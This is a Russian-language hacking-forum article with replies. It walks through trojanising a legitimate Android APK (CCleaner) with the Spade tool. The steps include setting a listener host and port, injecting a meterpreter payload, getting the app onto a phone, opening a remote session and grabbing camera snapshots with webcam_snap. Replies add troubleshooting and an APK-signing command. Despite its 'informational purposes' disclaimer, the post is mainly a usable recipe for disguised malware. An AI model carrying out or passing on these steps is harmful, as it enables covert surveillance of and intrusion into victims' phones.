Статья Взлом Android-устройства

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.git
upload_2016-10-17_20-20-41.png


После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

upload_2016-10-17_20-21-32.png


upload_2016-10-17_20-21-40.png


Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

upload_2016-10-17_20-22-6.png


Видим привилегии, которые нам доступны:

upload_2016-10-17_20-22-32.png


Готовый файл сохраняется в директории /root/spade

upload_2016-10-17_20-22-51.png


На запрос этой настройки отвечаем утвердительно:

upload_2016-10-17_20-23-18.png


Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

upload_2016-10-17_20-23-36.png


Попробуем осмотреться в системе:

upload_2016-10-17_20-23-55.png


Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snap
upload_2016-10-17_20-24-23.png


И эта команда срабатывает успешно:

upload_2016-10-17_20-24-45.png


На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -
 
Последнее редактирование:
A

areez

Все перепробовал... Не найду этот файл никак.. Либо он попросту не создался. Такая вот проблема возникает, чтоб понятнее было.

upload_2016-10-19_14-20-54.png
 
M

MAdDog719


Проблемка(. Пробовал переименовать файлик, не помогло.
 
M

MAdDog719

Наши с тобой темы часто перекликаются :) Чтоб не плодить одно и то же, я добавлю к твоему рассказу ещё одну софтину для этих целей. Написана на RUBY, скачать можно прям отсюда.
Ну и небольшой видео обзор к ней.
Работаем в команде )))


создал файлик, сбросил на андроид устройство, при попытке установки, смартфон написал, приложение не установлено и все.
 
K

Knife

Скрипт нужно запускать из под рута. Проверено. Если запускать из под юзера, именно эта ошибка.
 
K

Knife

Странно это все конечно, но если вдруг склеится, появится файл ccleaner-final.apk В этой же папке его можно подписать такой командой:
Код:
java -jar signapk.jar cert.x509.pem privatekey.pk8 ccleaner-final.apk [ваше название на выходе].apk
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!